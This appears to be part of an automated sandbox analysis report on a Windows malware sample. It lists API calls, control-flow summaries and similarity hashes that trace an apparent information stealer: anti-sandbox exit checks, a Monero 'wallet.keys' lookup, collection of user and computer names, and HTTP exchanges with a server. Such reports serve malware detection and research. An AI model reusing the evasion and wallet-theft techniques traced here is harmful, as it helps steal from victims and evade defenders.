                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BE7A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
• Associated: the same fifteen dump regions listed for the function above (bases 00BD0000, 00BFC000, 00D0D000, 00D19000, 00D3E000, 00EA6000, 00EBA000, 0104D000, 01125000, 0114D000, 01154000, 01164000, 01165000, 01307000, 01308000)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 0f2e49ea14120e265a1f02c5704913ce5faa1714e553590a64ba759378d39907
                                    • Instruction ID: 2b4334b819cada17edbad5ef25be765a5bbaeff9635de655157285aef936cde5
                                    • Opcode Fuzzy Hash: 0f2e49ea14120e265a1f02c5704913ce5faa1714e553590a64ba759378d39907
                                    • Instruction Fuzzy Hash: 87F0C2B2948209EFCB00CF89DC45BAEFFB8FB49711F10025AFA05A3690C7B42504CBA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
• Associated: the same fifteen dump regions listed for the function above (bases 00BD0000, 00BFC000, 00D0D000, 00D19000, 00D3E000, 00EA6000, 00EBA000, 0104D000, 01125000, 0114D000, 01154000, 01164000, 01165000, 01307000, 01308000)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 72930a09030cbbbdd64330b7721236c8dbdc6dfa0c70e0ff54b188f36e80819b
                                    • Instruction ID: 7fc24789ebf87f489e54c688fc1d92d13f2cc1cfa50866147968831d31b25485
                                    • Opcode Fuzzy Hash: 72930a09030cbbbdd64330b7721236c8dbdc6dfa0c70e0ff54b188f36e80819b
                                    • Instruction Fuzzy Hash: A5D05E7490530CAFCB04DFE19C496DDBBB8FB0D215F000595D90572340EA306445CB65

Control-flow Graph
                                    control_flow_graph 633 be9f20-be9f2a 634 bea346-bea3da LoadLibraryA * 8 633->634 635 be9f30-bea341 GetProcAddress * 43 633->635 636 bea3dc-bea451 GetProcAddress * 5 634->636 637 bea456-bea45d 634->637 635->634 636->637 638 bea526-bea52d 637->638 639 bea463-bea521 GetProcAddress * 8 637->639 640 bea52f-bea5a3 GetProcAddress * 5 638->640 641 bea5a8-bea5af 638->641 639->638 640->641 642 bea647-bea64e 641->642 643 bea5b5-bea642 GetProcAddress * 6 641->643 644 bea72f-bea736 642->644 645 bea654-bea72a GetProcAddress * 9 642->645 643->642 646 bea738-bea7ad GetProcAddress * 5 644->646 647 bea7b2-bea7b9 644->647 645->644 646->647 648 bea7ec-bea7f3 647->648 649 bea7bb-bea7e7 GetProcAddress * 2 647->649 650 bea825-bea82c 648->650 651 bea7f5-bea820 GetProcAddress * 2 648->651 649->648 652 bea922-bea929 650->652 653 bea832-bea91d GetProcAddress * 10 650->653 651->650 654 bea98d-bea994 652->654 655 bea92b-bea988 GetProcAddress * 4 652->655 653->652 656 bea9ae-bea9b5 654->656 657 bea996-bea9a9 GetProcAddress 654->657 655->654 658 beaa18-beaa19 656->658 659 bea9b7-beaa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,018A61B0), ref: 00BE9F3D
                                    • GetProcAddress.KERNEL32(74DD0000,018A6410), ref: 00BE9F55
                                    • GetProcAddress.KERNEL32(74DD0000,018B9480), ref: 00BE9F6E
                                    • GetProcAddress.KERNEL32(74DD0000,018B9408), ref: 00BE9F86
                                    • GetProcAddress.KERNEL32(74DD0000,018B93D8), ref: 00BE9F9E
                                    • GetProcAddress.KERNEL32(74DD0000,018B93F0), ref: 00BE9FB7
                                    • GetProcAddress.KERNEL32(74DD0000,018ABEE8), ref: 00BE9FCF
                                    • GetProcAddress.KERNEL32(74DD0000,018BCEE0), ref: 00BE9FE7
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD60), ref: 00BEA000
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDA8), ref: 00BEA018
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCD0), ref: 00BEA030
                                    • GetProcAddress.KERNEL32(74DD0000,018A61D0), ref: 00BEA049
                                    • GetProcAddress.KERNEL32(74DD0000,018A62B0), ref: 00BEA061
                                    • GetProcAddress.KERNEL32(74DD0000,018A6210), ref: 00BEA079
                                    • GetProcAddress.KERNEL32(74DD0000,018A6250), ref: 00BEA092
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCE8), ref: 00BEA0AA
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD78), ref: 00BEA0C2
                                    • GetProcAddress.KERNEL32(74DD0000,018ABE98), ref: 00BEA0DB
                                    • GetProcAddress.KERNEL32(74DD0000,018A6290), ref: 00BEA0F3
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD48), ref: 00BEA10B
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD90), ref: 00BEA124
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE20), ref: 00BEA13C
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDC0), ref: 00BEA154
                                    • GetProcAddress.KERNEL32(74DD0000,018A62F0), ref: 00BEA16D
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD00), ref: 00BEA185
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE68), ref: 00BEA19D
                                    • GetProcAddress.KERNEL32(74DD0000,018BCF10), ref: 00BEA1B6
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD18), ref: 00BEA1CE
                                    • GetProcAddress.KERNEL32(74DD0000,018BCEC8), ref: 00BEA1E6
                                    • GetProcAddress.KERNEL32(74DD0000,018BCC28), ref: 00BEA1FF
                                    • GetProcAddress.KERNEL32(74DD0000,018BCEF8), ref: 00BEA217
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE98), ref: 00BEA22F
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD30), ref: 00BEA248
                                    • GetProcAddress.KERNEL32(74DD0000,018BA628), ref: 00BEA260
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDD8), ref: 00BEA278
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCA0), ref: 00BEA291
                                    • GetProcAddress.KERNEL32(74DD0000,018A6350), ref: 00BEA2A9
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDF0), ref: 00BEA2C1
                                    • GetProcAddress.KERNEL32(74DD0000,018A5F30), ref: 00BEA2DA
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCB8), ref: 00BEA2F2
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE80), ref: 00BEA30A
                                    • GetProcAddress.KERNEL32(74DD0000,018A5DF0), ref: 00BEA323
                                    • GetProcAddress.KERNEL32(74DD0000,018A6050), ref: 00BEA33B
                                    • LoadLibraryA.KERNEL32(018BCE08,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA34D
                                    • LoadLibraryA.KERNEL32(018BCC70,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA35E
                                    • LoadLibraryA.KERNEL32(018BCC40,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA370
                                    • LoadLibraryA.KERNEL32(018BCC58,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA382
                                    • LoadLibraryA.KERNEL32(018BCE38,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA393
                                    • LoadLibraryA.KERNEL32(018BCC88,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA3A5
                                    • LoadLibraryA.KERNEL32(018BCE50,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA3B7
                                    • LoadLibraryA.KERNEL32(018BCEB0,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA3C8
                                    • GetProcAddress.KERNEL32(75290000,018A5EF0), ref: 00BEA3EA
                                    • GetProcAddress.KERNEL32(75290000,018BD090), ref: 00BEA402
                                    • GetProcAddress.KERNEL32(75290000,018B8D10), ref: 00BEA41A
                                    • GetProcAddress.KERNEL32(75290000,018BD0C0), ref: 00BEA433
                                    • GetProcAddress.KERNEL32(75290000,018A5DB0), ref: 00BEA44B
                                    • GetProcAddress.KERNEL32(734C0000,018ABFD8), ref: 00BEA470
                                    • GetProcAddress.KERNEL32(734C0000,018A5FD0), ref: 00BEA489
                                    • GetProcAddress.KERNEL32(734C0000,018ABF10), ref: 00BEA4A1
                                    • GetProcAddress.KERNEL32(734C0000,018BCF40), ref: 00BEA4B9
                                    • GetProcAddress.KERNEL32(734C0000,018BD1F8), ref: 00BEA4D2
                                    • GetProcAddress.KERNEL32(734C0000,018A5C90), ref: 00BEA4EA
                                    • GetProcAddress.KERNEL32(734C0000,018A5CF0), ref: 00BEA502
                                    • GetProcAddress.KERNEL32(734C0000,018BD018), ref: 00BEA51B
                                    • GetProcAddress.KERNEL32(752C0000,018A5D10), ref: 00BEA53C
                                    • GetProcAddress.KERNEL32(752C0000,018A5ED0), ref: 00BEA554
                                    • GetProcAddress.KERNEL32(752C0000,018BD060), ref: 00BEA56D
                                    • GetProcAddress.KERNEL32(752C0000,018BCFB8), ref: 00BEA585
                                    • GetProcAddress.KERNEL32(752C0000,018A5CD0), ref: 00BEA59D
                                    • GetProcAddress.KERNEL32(74EC0000,018ABD30), ref: 00BEA5C3
                                    • GetProcAddress.KERNEL32(74EC0000,018ABF60), ref: 00BEA5DB
                                    • GetProcAddress.KERNEL32(74EC0000,018BCFD0), ref: 00BEA5F3
                                    • GetProcAddress.KERNEL32(74EC0000,018A5E50), ref: 00BEA60C
                                    • GetProcAddress.KERNEL32(74EC0000,018A5F10), ref: 00BEA624
                                    • GetProcAddress.KERNEL32(74EC0000,018ABC90), ref: 00BEA63C
                                    • GetProcAddress.KERNEL32(75BD0000,018BD1C8), ref: 00BEA662
                                    • GetProcAddress.KERNEL32(75BD0000,018A5F50), ref: 00BEA67A
                                    • GetProcAddress.KERNEL32(75BD0000,018B8D20), ref: 00BEA692
                                    • GetProcAddress.KERNEL32(75BD0000,018BD150), ref: 00BEA6AB
                                    • GetProcAddress.KERNEL32(75BD0000,018BD168), ref: 00BEA6C3
                                    • GetProcAddress.KERNEL32(75BD0000,018A5E30), ref: 00BEA6DB
                                    • GetProcAddress.KERNEL32(75BD0000,018A5E70), ref: 00BEA6F4
                                    • GetProcAddress.KERNEL32(75BD0000,018BD0D8), ref: 00BEA70C
                                    • GetProcAddress.KERNEL32(75BD0000,018BD1E0), ref: 00BEA724
                                    • GetProcAddress.KERNEL32(75A70000,018A5E90), ref: 00BEA746
                                    • GetProcAddress.KERNEL32(75A70000,018BD0F0), ref: 00BEA75E
                                    • GetProcAddress.KERNEL32(75A70000,018BD030), ref: 00BEA776
                                    • GetProcAddress.KERNEL32(75A70000,018BD210), ref: 00BEA78F
                                    • GetProcAddress.KERNEL32(75A70000,018BCF28), ref: 00BEA7A7
                                    • GetProcAddress.KERNEL32(75450000,018A5EB0), ref: 00BEA7C8
                                    • GetProcAddress.KERNEL32(75450000,018A5F70), ref: 00BEA7E1
                                    • GetProcAddress.KERNEL32(75DA0000,018A5F90), ref: 00BEA802
                                    • GetProcAddress.KERNEL32(75DA0000,018BD180), ref: 00BEA81A
                                    • GetProcAddress.KERNEL32(6F070000,018A5FB0), ref: 00BEA840
                                    • GetProcAddress.KERNEL32(6F070000,018A5FF0), ref: 00BEA858
                                    • GetProcAddress.KERNEL32(6F070000,018A6010), ref: 00BEA870
                                    • GetProcAddress.KERNEL32(6F070000,018BD108), ref: 00BEA889
                                    • GetProcAddress.KERNEL32(6F070000,018A6030), ref: 00BEA8A1
                                    • GetProcAddress.KERNEL32(6F070000,018A6070), ref: 00BEA8B9
                                    • GetProcAddress.KERNEL32(6F070000,018A5CB0), ref: 00BEA8D2
                                    • GetProcAddress.KERNEL32(6F070000,018A5D30), ref: 00BEA8EA
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00BEA901
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00BEA917
                                    • GetProcAddress.KERNEL32(75AF0000,018BCF58), ref: 00BEA939
                                    • GetProcAddress.KERNEL32(75AF0000,018B8D30), ref: 00BEA951
                                    • GetProcAddress.KERNEL32(75AF0000,018BCF70), ref: 00BEA969
                                    • GetProcAddress.KERNEL32(75AF0000,018BCF88), ref: 00BEA982
                                    • GetProcAddress.KERNEL32(75D90000,018A5D50), ref: 00BEA9A3
                                    • GetProcAddress.KERNEL32(6FAA0000,018BD198), ref: 00BEA9C4
                                    • GetProcAddress.KERNEL32(6FAA0000,018A5D70), ref: 00BEA9DD
                                    • GetProcAddress.KERNEL32(6FAA0000,018BD1B0), ref: 00BEA9F5
                                    • GetProcAddress.KERNEL32(6FAA0000,018BCFA0), ref: 00BEAA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
• Associated: the same fifteen dump regions listed for the function above (bases 00BD0000, 00BFC000, 00D0D000, 00D19000, 00D3E000, 00EA6000, 00EBA000, 0104D000, 01125000, 0114D000, 01154000, 01164000, 01165000, 01307000, 01308000)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: c0548ce235ebb310dae18665448b151c17ef9ce2cbbaaedbca1f5ab1c4cceb65
                                    • Instruction ID: 6eb888a85847816962a94d51623b3d9dd6d80038d39d83592dd9ce384c056bd5
                                    • Opcode Fuzzy Hash: c0548ce235ebb310dae18665448b151c17ef9ce2cbbaaedbca1f5ab1c4cceb65
                                    • Instruction Fuzzy Hash: F06264B66191009FC344DFABEC88A667BF9B79F341704851AB989E3270D734B949CF60

Control-flow Graph
                                    control_flow_graph 801 bd48d0-bd4992 call beaab0 call bd4800 call beaa50 * 5 InternetOpenA StrCmpCA 816 bd499b-bd499f 801->816 817 bd4994 801->817 818 bd4f1b-bd4f43 InternetCloseHandle call beade0 call bda210 816->818 819 bd49a5-bd4b1d call be8cf0 call beac30 call beabb0 call beab10 * 2 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beac30 call beabb0 call beab10 * 2 InternetConnectA 816->819 817->816 829 bd4f45-bd4f7d call beab30 call beacc0 call beabb0 call beab10 818->829 830 bd4f82-bd4ff2 call be8b20 * 2 call beaab0 call beab10 * 8 818->830 819->818 905 bd4b23-bd4b27 819->905 829->830 906 bd4b29-bd4b33 905->906 907 bd4b35 905->907 908 bd4b3f-bd4b72 HttpOpenRequestA 906->908 907->908 909 bd4f0e-bd4f15 InternetCloseHandle 908->909 910 bd4b78-bd4e78 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beacc0 call beabb0 call beab10 call beac30 call beabb0 call beab10 call beaa50 call beac30 * 2 call beabb0 call beab10 * 2 call beade0 lstrlen call beade0 * 2 lstrlen call beade0 HttpSendRequestA 908->910 909->818 1021 bd4e82-bd4eac InternetReadFile 910->1021 1022 bd4eae-bd4eb5 1021->1022 1023 bd4eb7-bd4f09 InternetCloseHandle call beab10 1021->1023 1022->1023 1024 bd4eb9-bd4ef7 call beacc0 call beabb0 call beab10 1022->1024 1023->909 1024->1021
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BD4965
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD4B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BF0DDE,00000000,?,?,00000000,?,",00000000,?,018BE688), ref: 00BD4E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BD4E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BD4E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BD4E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD4EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD4F15
                                    • HttpOpenRequestA.WININET(00000000,018BE708,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD4B65
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD4F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: a8b615615ea66bdb84f64c4dbe1a325b69ed04993256c999f7c02a4807b7d73d
                                    • Instruction ID: b4ded53b416b266d5f355b239cdb4f36c0aedb39bd232527c4824a51f6142f4c
                                    • Opcode Fuzzy Hash: a8b615615ea66bdb84f64c4dbe1a325b69ed04993256c999f7c02a4807b7d73d
                                    • Instruction Fuzzy Hash: 6112F972911158ABCB14EBA1CDA2FEEB7BDAF25300F1145D9B10662191EF707B48CF61

                                    Control-flow Graph

                                    [Control-flow graph image not recoverable from the page; basic blocks span be5760-be5d16 and call StrCmpCA and Sleep]
                                    APIs
                                      • Part of subcall function 00BEAB30: lstrlen.KERNEL32(00BD4F55,?,?,00BD4F55,00BF0DDF), ref: 00BEAB3B
                                      • Part of subcall function 00BEAB30: lstrcpy.KERNEL32(00BF0DDF,00000000), ref: 00BEAB95
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE58F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5AA7
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BE5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5478
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5568
                                      • Part of subcall function 00BE5510: lstrlen.KERNEL32(00000000), ref: 00BE557F
                                      • Part of subcall function 00BE5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00BE55B4
                                      • Part of subcall function 00BE5510: lstrlen.KERNEL32(00000000), ref: 00BE55D3
                                      • Part of subcall function 00BE5510: lstrlen.KERNEL32(00000000), ref: 00BE55FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE59DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BE5C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00BE5C6B
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 8272a445752fc435460a3049f081eba27f7c0127849ddf1336f6ef4700446233
                                    • Instruction ID: 07200f581cd9b926efc69fbc4c86876f0e3a12bb29683ca0d31a6db4295c4c14
                                    • Opcode Fuzzy Hash: 8272a445752fc435460a3049f081eba27f7c0127849ddf1336f6ef4700446233
                                    • Instruction Fuzzy Hash: CCE13171D101489ACB14FBB6EDA2EED77BDAF55300F4085E8B50666191EF34BA0CCB62

                                    Control-flow Graph

                                    [Control-flow graph image not recoverable from the page; basic blocks span be19f0-be1c1d and call StrCmpCA and ExitProcess]
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00BE1A15
                                    • ExitProcess.KERNEL32 ref: 00BE1A21
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 19ba534012f29d6afcc7273f8851f2827b89a73999831b592b958a0f5bacec16
                                    • Instruction ID: 50b69078cf7a5413a938a3272c47629b901d0f745dc838051f89177e3e959759
                                    • Opcode Fuzzy Hash: 19ba534012f29d6afcc7273f8851f2827b89a73999831b592b958a0f5bacec16
                                    • Instruction Fuzzy Hash: FD5132B4B042499FCB04DFA9D994BAE77F9EF44704F2044D8E912AB261E770E944CB61

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2148), ref: 00BE9BF1
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B21F0), ref: 00BE9C0A
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2178), ref: 00BE9C22
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B22B0), ref: 00BE9C3A
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2190), ref: 00BE9C53
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B8E00), ref: 00BE9C6B
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018A60D0), ref: 00BE9C83
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018A6430), ref: 00BE9C9C
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B22C8), ref: 00BE9CB4
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B1FE0), ref: 00BE9CCC
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B1FF8), ref: 00BE9CE5
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2010), ref: 00BE9CFD
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018A62D0), ref: 00BE9D15
                                      • Part of subcall function 00BE9BB0: GetProcAddress.KERNEL32(74DD0000,018B2028), ref: 00BE9D2E
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BD11D0: ExitProcess.KERNEL32 ref: 00BD1211
                                      • Part of subcall function 00BD1160: GetSystemInfo.KERNEL32(?), ref: 00BD116A
                                      • Part of subcall function 00BD1160: ExitProcess.KERNEL32 ref: 00BD117E
                                      • Part of subcall function 00BD1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BD112B
                                      • Part of subcall function 00BD1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BD1132
                                      • Part of subcall function 00BD1110: ExitProcess.KERNEL32 ref: 00BD1143
                                      • Part of subcall function 00BD1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BD123E
                                      • Part of subcall function 00BD1220: __aulldiv.LIBCMT ref: 00BD1258
                                      • Part of subcall function 00BD1220: __aulldiv.LIBCMT ref: 00BD1266
                                      • Part of subcall function 00BD1220: ExitProcess.KERNEL32 ref: 00BD1294
                                      • Part of subcall function 00BE6A10: GetUserDefaultLangID.KERNEL32 ref: 00BE6A14
                                      • Part of subcall function 00BD1190: ExitProcess.KERNEL32 ref: 00BD11C6
                                      • Part of subcall function 00BE79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BD11B7), ref: 00BE7A10
                                      • Part of subcall function 00BE79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7A17
                                      • Part of subcall function 00BE79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BE7A2F
                                      • Part of subcall function 00BE7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7AA0
                                      • Part of subcall function 00BE7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BE7AA7
                                      • Part of subcall function 00BE7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BE7ABF
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BE6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE6D99
                                    • Sleep.KERNEL32(00001770), ref: 00BE6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,018B8E90,?,00BF10F4,?,00000000,?,00BF10F8,?,00000000,00BF0AF3), ref: 00BE6DBA
                                    • ExitProcess.KERNEL32 ref: 00BE6DC2
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: 664a3c704ddf77a0eab3f0d8651398a63ad2491a91533efacb4a5612560b3ac2
